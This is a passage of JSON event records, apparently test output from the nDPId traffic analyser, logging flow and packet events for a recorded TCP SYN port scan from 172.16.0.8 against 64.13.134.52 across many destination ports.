+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsU6cAACoGysusEAAIQA2GNIzSBCndUoMYAAAAAGACDAAoZgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsZn8AAC4Gs\/OsEAAIQA2GNIzSgAjdUoMYAAAAAGACDACshgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsJZsAACUG\/desEAAIQA2GNIzSBOvdUoMYAAAAAGACCAArpAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsHDIAADEG+0CsEAAIQA2GNIzSJXvdUoMYAAAAAGACCAALFAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsglIAACkGnSCsEAAIQA2GNIzSiqzdUoMYAAAAAGACCACl4gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsa3cAADkGo\/usEAAIQA2GNIzSJ2LdUoMYAAAAAGACCAAJLQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsBO4AADEGEoWsEAAIQA2GNIzSAAfdUoMYAAAAAGACCAAwiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsrgIAADEGaXCsEAAIQA2GNIzSB93dUoMYAAAAAGACCAAosgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsRe0AADIG0IWsEAAIQA2GNIzSAdDdUoMYAAAAAGACDAAqvwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ5QAADgGzN6sEAAIQA2GNIzSF4ndUoMYAAAAAGACBAAdBgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAswz8AACUGYDOsEAAIQA2GNIzSFmLdUoMYAAAAAGACCAAaLQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsL+0AAC4G6oWsEAAIQA2GNIzSH1XdUoMYAAAAAGACDAANOgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsKdMAADAG7p+sEAAIQA2GNIzSDb3dUoMYAAAAAGACBAAm0gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059281,"pkt":"ACYLMQczACWzv5HuCABFAAAsms0AADcGdqWsEAAIQA2GNIzSBEDdUoMYAAAAAGACEAAkTwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059281,"pkt":"ACYLMQczACWzv5HuCABFAAAsCD4AADcGCTWsEAAIQA2GNIzSA+fdUoMYAAAAAGACEAAkqAAAAgQFtA=="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1278275059338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275059338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAA1jNJCmj\/E3VKDGWASFtCfagAAAgQFZAAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs9vMAADkGGH+sEAAIQA2GNIzdAHHcUoIYAAAAAGACCAAyEwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsw0AAACkGXDKsEAAIQA2GNIzTG57dU4MZAAAAAGACCAAU7gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs0NgAACYGUZqsEAAIQA2GNIzTCJjdU4MZAAAAAGACDAAj9AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsa6EAACwGsNGsEAAIQA2GNIzTDOXdU4MZAAAAAGACBAAnpwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsb8IAADkGn7CsEAAIQA2GNIzTAKPdU4MZAAAAAGACCAAv6QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsHD8AADUG9zOsEAAIQA2GNIzTgAzdU4MZAAAAAGACCACwfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsHIEAAC0G\/vGsEAAIQA2GNIzTHufdU4MZAAAAAGACCAARpQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAszKQAACgGU86sEAAIQA2GNIzTH6TdU4MZAAAAAGACBAAU6AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4YAADUGr+ysEAAIQA2GNIzTB0bdU4MZAAAAAGACCAApRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsdKsAACcGrMesEAAIQA2GNIzTJtjdU4MZAAAAAGACEAABtAAAAgQFtA=="} 